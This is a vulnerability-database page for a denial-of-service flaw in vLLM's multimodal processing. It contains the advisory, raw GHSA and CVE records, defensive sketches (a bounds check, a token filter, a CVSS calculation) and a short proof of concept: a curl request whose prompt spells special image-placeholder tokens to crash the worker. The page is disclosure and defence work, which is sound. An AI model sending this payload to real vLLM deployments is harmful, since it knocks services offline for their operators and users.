Vulnerability-Lookup

GHSA-HPV8-X276-M59F

Vulnerability from github – Published: 2026-05-05 22:21 – Updated: 2026-05-13 16:27

Summary

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Details

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Text-only prompts from unauthenticated users that spell out special tokens are interpreted as control tokens. When image or video placeholder sequences arrive without matching data, vLLM indexes into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

Affected component: multimodal input position computation.
File/functions (paths are indicative):
vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
Failure mechanism:
The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
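
The failure mechanism can be illustrated outside vLLM with a minimal sketch. Everything in it is an assumption made for illustration: the token ID, the helper names `count_placeholders` and `check_grid_coverage`, and the simplification that each placeholder token needs exactly one grid entry. It is not the fix shipped in vLLM, only one way a bounds check before indexing might look.

```python
# Illustrative only: these helpers are hypothetical and are not vLLM functions.
VIDEO_TOKEN_ID = 1001  # made-up placeholder ID for this sketch


def count_placeholders(input_tokens, token_id):
    """Count how many times a placeholder token appears in the prompt."""
    return sum(1 for tok in input_tokens if tok == token_id)


def check_grid_coverage(input_tokens, token_id, grid_thw):
    """Raise ValueError if placeholders outnumber the supplied grid entries."""
    needed = count_placeholders(input_tokens, token_id)
    available = len(grid_thw)
    if needed > available:
        raise ValueError(
            f"prompt contains {needed} placeholder token(s) but only "
            f"{available} grid entries were supplied"
        )


# A text-only prompt that spells a placeholder: one token, no grid data.
tokens = [5, 9, VIDEO_TOKEN_ID, 7]
empty_grid = []

# Indexing without a check reproduces the failure mode described above.
try:
    t, h, w = empty_grid[0]
    unchecked_error = None
except IndexError as exc:
    unchecked_error = type(exc).__name__
```

Calling `check_grid_coverage(tokens, VIDEO_TOKEN_ID, empty_grid)` before indexing turns the crash into a `ValueError` that a request handler could report as a client error instead of letting it propagate into the worker.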

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

vLLM: 0.10.0
Model: Qwen/Qwen2.5-VL-3B-Instruct
Launch server:

python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
In some deployments, the worker exits and capacity remains reduced until manual restart.

Impact

Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
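
Because the scope covers any front end that forwards raw user text, one possible stopgap in front of an unpatched server is to flag text parts that spell placeholder tokens. The sketch below is an assumption-laden illustration, not part of vLLM: the function names are hypothetical, the token list is taken from the PoC request, and `<|video_pad|>` is added as an assumed video counterpart that the advisory does not show.

```python
# Hypothetical gateway-side check; not part of vLLM.
SUSPECT_TOKENS = (
    "<|vision_start|>",
    "<|image_pad|>",
    "<|vision_end|>",
    "<|video_pad|>",  # assumption: not shown in the advisory's PoC
)


def text_parts(message):
    """Yield every text fragment of one chat message (string or part list)."""
    content = message.get("content")
    if isinstance(content, str):
        yield content
    elif isinstance(content, list):
        for part in content:
            if isinstance(part, dict) and part.get("type") == "text":
                yield part.get("text") or ""


def spelled_placeholders(request_body):
    """Return the sorted placeholder strings found in the request's text."""
    found = set()
    for message in request_body.get("messages", []):
        for text in text_parts(message):
            for token in SUSPECT_TOKENS:
                if token in text:
                    found.add(token)
    return sorted(found)


poc_body = {
    "model": "Qwen/Qwen2.5-VL-3B-Instruct",
    "messages": [
        {
            "role": "user",
            "content": [
                {
                    "type": "text",
                    "text": "what's in picture "
                            "<|vision_start|><|image_pad|><|vision_end|>",
                }
            ],
        }
    ],
}
```

A proxy could reject or sanitize a request when `spelled_placeholders(body)` is non-empty. String matching of this kind is model-specific and easy to get wrong, so it complements rather than replaces upgrading to a fixed release.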

Fixes

Changes associated with https://github.com/vllm-project/vllm/issues/32656

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

Severity

6.5 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
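
The 6.5 score follows from the vector by the CVSS v3.1 base-score equations. The sketch below reproduces that arithmetic for scope-unchanged vectors only; the function names are illustrative, and the weights and rounding rule are those given in the CVSS v3.1 specification.

```python
import math

# CVSS v3.1 metric weights (PR values are the scope-unchanged ones).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place as defined in the CVSS v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a scope-unchanged CVSS v3.1 vector."""
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise NotImplementedError("this sketch handles S:U only")
    w = {name: WEIGHTS[name][parts[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H")
```

For this vector the impact term is about 3.60 and the exploitability term about 2.84, so the sum of roughly 6.43 rounds up to 6.5.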


JSON


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.6.1"
            },
            {
              "fixed": "0.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44222"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-129"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T22:21:41Z",
    "nvd_published_at": "2026-05-12T20:16:43Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nThis report explains a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n  - vllm/model_executor/layers/rotary_embedding.py\n    - get_input_positions_tensor(...)\n    - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. 
The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n    cls,\n    input_tokens,\n    hf_config,\n    image_grid_thw,\n    video_grid_thw,\n    ...,\n):\n    # detect video tokens\n    video_nums = (vision_tokens == video_token_id).sum()\n    # later in processing\n    t, h, w = (\n        video_grid_thw[video_index][0],  # IndexError if no video data\n        video_grid_thw[video_index][1],\n        video_grid_thw[video_index][2],\n    )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n \u2192 vllm.v1.engine.core: step/execute_model\n \u2192 vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n \u2192 vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n \u2192 _vl_get_input_positions_tensor\n \u2192 IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n  --model Qwen/Qwen2.5-VL-3B-Instruct \\\n  --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c\u0027JSON\u0027\n{\n  \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        { \"type\": \"text\",\n          \"text\": \"what\u0027s in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n      ]\n    }\n  ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of 
Service (unauthenticated). A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request \u2192 unhandled exception in position computation \u2192 worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group)  \nZiteng Xu (Infra Security, Ant Group)",
  "id": "GHSA-hpv8-x276-m59f",
  "modified": "2026-05-13T16:27:48Z",
  "published": "2026-05-05T22:21:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44222"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/issues/32656"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM Vulnerable to Remote DoS via Special-Token Placeholders"
}

CVE-2026-44222 (GCVE-0-2026-44222)

Vulnerability from cvelistv5 – Published: 2026-05-12 19:57 – Updated: 2026-05-13 12:24

Title

vLLM: Remote DoS via Special-Token Placeholders

Summary

vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.

Severity

6.5 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

SSVC

Exploitation: none Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-129 - Improper Validation of Array Index

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/vllm-project/vllm/security/adv…	x_refsource_CONFIRM
https://github.com/vllm-project/vllm/issues/32656	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
vllm-project	vllm	Affected: >= 0.6.1, < 0.20.0
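
The affected range can be checked mechanically against an installed version. The following is a minimal sketch under stated assumptions: `parse_version` and `is_affected` are hypothetical helpers, and only plain dotted numeric versions such as `0.10.0` are handled (pre-release or local suffixes would need a real version parser).

```python
def parse_version(text):
    """Turn a dotted numeric version like '0.10.0' into a tuple of ints."""
    return tuple(int(piece) for piece in text.split("."))


# Range taken from the record: >= 0.6.1, < 0.20.0
INTRODUCED = parse_version("0.6.1")
FIXED = parse_version("0.20.0")


def is_affected(version):
    """Return True if the version falls inside the affected range."""
    return INTRODUCED <= parse_version(version) < FIXED


reproduced_on_affected = is_affected("0.10.0")
```

Comparing integer tuples rather than strings matters here: as strings, `"0.10.0"` sorts before `"0.6.1"`, which would wrongly place the version used in the PoC outside the range.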


JSON


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44222",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T12:24:39.409933Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T12:24:53.560Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vllm",
          "vendor": "vllm-project",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.6.1, \u003c 0.20.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-129",
              "description": "CWE-129: Improper Validation of Array Index",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-12T19:57:25.336Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
        },
        {
          "name": "https://github.com/vllm-project/vllm/issues/32656",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/issues/32656"
        }
      ],
      "source": {
        "advisory": "GHSA-hpv8-x276-m59f",
        "discovery": "UNKNOWN"
      },
      "title": "vLLM: Remote DoS via Special-Token Placeholders"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44222",
    "datePublished": "2026-05-12T19:57:25.336Z",
    "dateReserved": "2026-05-05T15:42:40.518Z",
    "dateUpdated": "2026-05-13T12:24:53.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

